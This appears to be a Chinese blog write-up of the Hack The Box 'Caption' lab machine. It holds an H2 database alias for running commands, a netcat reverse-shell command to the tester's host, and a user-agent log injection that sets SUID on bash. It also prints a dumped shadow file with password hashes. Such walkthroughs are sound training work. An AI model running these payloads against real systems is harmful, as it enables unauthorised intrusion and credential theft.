扫描靶机
nmap -T4 -A -v 10.10.11.33
扫描出了5个端口,有个域名caption.htb,然后打开80看看
这挺好看的,geishell后保存网站~,可惜没有账号密码,再看看8080端口
随便浏览一下,点击右上角的system administration,可以看到一个可编写的数据库
可以参考这篇文章getshell
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\A"); return s.hasNext() ? s.next() : ""; }$$;
CALL SHELLEXEC('busybox nc 10.10.14.xx 9999 -e sh')
这样就成功的拿到了user flag,为了方便,先使用ssh-keyget -t rsa生成密钥,然后ssh登录
可以看到后台有个9090端口,代理出来,9090端口是无法打开的,接下来提权,先创建一个malicious.log,然后再创建一个sh文件,内容是这些,东西都放在靶机/tmp上
malicious.log
127.0.0.1 "user-agent":"'; /bin/bash /tmp/payload.sh #"
payload.sh
chmod +s /bin/bash
log_service.thrift
namespace go log_service
service LogService {
string ReadLogFile(1: string filePath)
}
这里可以安装
https://thrift-tutorial.readthedocs.io/en/latest/installation.html
apt install thrift-compiler
thrift -r --gen py log_service.thrift
然后进入到gen文件夹,创建一个client脚本
from thrift import Thrift
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from log_service import LogService # 导入生成的Thrift客户端代码
def main():
# 设置到服务器的传输
transport = TSocket.TSocket('localhost', 9090)
# 使用缓冲传输提高性能
transport = TTransport.TBufferedTransport(transport)
# 使用二进制协议
protocol = TBinaryProtocol.TBinaryProtocol(transport)
# 创建客户端以使用服务
client = LogService.Client(protocol)
# 打开连接
transport.open()
try:
# 指定要处理的日志文件路径
log_file_path = "/tmp/malicious.log"
# 调用远程方法ReadLogFile并获取结果
response = client.ReadLogFile(log_file_path)
print("服务器响应:", response)
except Thrift.TException as tx:
# 捕获Thrift异常
print(f"Thrift异常: {tx}")
# 关闭传输
transport.close()
if __name__ == '__main__':
main()
然后在靶机上运行bash -p
root:$y$j9T$Z0mAEpyXxUFgbF4zyQYIm0$tfEWxKHM9Yv0fztCJ6GT/RYj87nvBZIl3t8ssYc3GnB:19956:0:99999:7:::
daemon:*:19405:0:99999:7:::
bin:*:19405:0:99999:7:::
sys:*:19405:0:99999:7:::
sync:*:19405:0:99999:7:::
games:*:19405:0:99999:7:::
man:*:19405:0:99999:7:::
lp:*:19405:0:99999:7:::
mail:*:19405:0:99999:7:::
news:*:19405:0:99999:7:::
uucp:*:19405:0:99999:7:::
proxy:*:19405:0:99999:7:::
www-data:*:19405:0:99999:7:::
backup:*:19405:0:99999:7:::
list:*:19405:0:99999:7:::
irc:*:19405:0:99999:7:::
gnats:*:19405:0:99999:7:::
nobody:*:19405:0:99999:7:::
_apt:*:19405:0:99999:7:::
systemd-network:*:19405:0:99999:7:::
systemd-resolve:*:19405:0:99999:7:::
messagebus:*:19405:0:99999:7:::
systemd-timesync:*:19405:0:99999:7:::
pollinate:*:19405:0:99999:7:::
sshd:*:19405:0:99999:7:::
syslog:*:19405:0:99999:7:::
uuidd:*:19405:0:99999:7:::
tcpdump:*:19405:0:99999:7:::
tss:*:19405:0:99999:7:::
landscape:*:19405:0:99999:7:::
fwupd-refresh:*:19405:0:99999:7:::
usbmux:*:19474:0:99999:7:::
lxd:!:19474::::::
haproxy:!:19788:0:99999:7:::
varnish:*:19788:0:99999:7:::
vcache:*:19788:0:99999:7:::
varnishlog:*:19788:0:99999:7:::
margo:$y$j9T$1.nErPXvyX8GM8SBRu8/B1$rCxIQkAu/A5K6b5xIZBJ6oeKfPp6R3WHDds/Z1OTEZ8:19956:0:99999:7:::
ruth:$y$j9T$8eN6xHfvLg4evyRqa2g7l1$AgJWIup1DAeX.Vo1wr69..LMTys7hBGepHknEKPwMOB:19960:0:99999:7:::
_laurel:!:19965::::::
原文始发于微信公众号(Jiyou too beautiful):HTB-Caption笔记(水文版)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论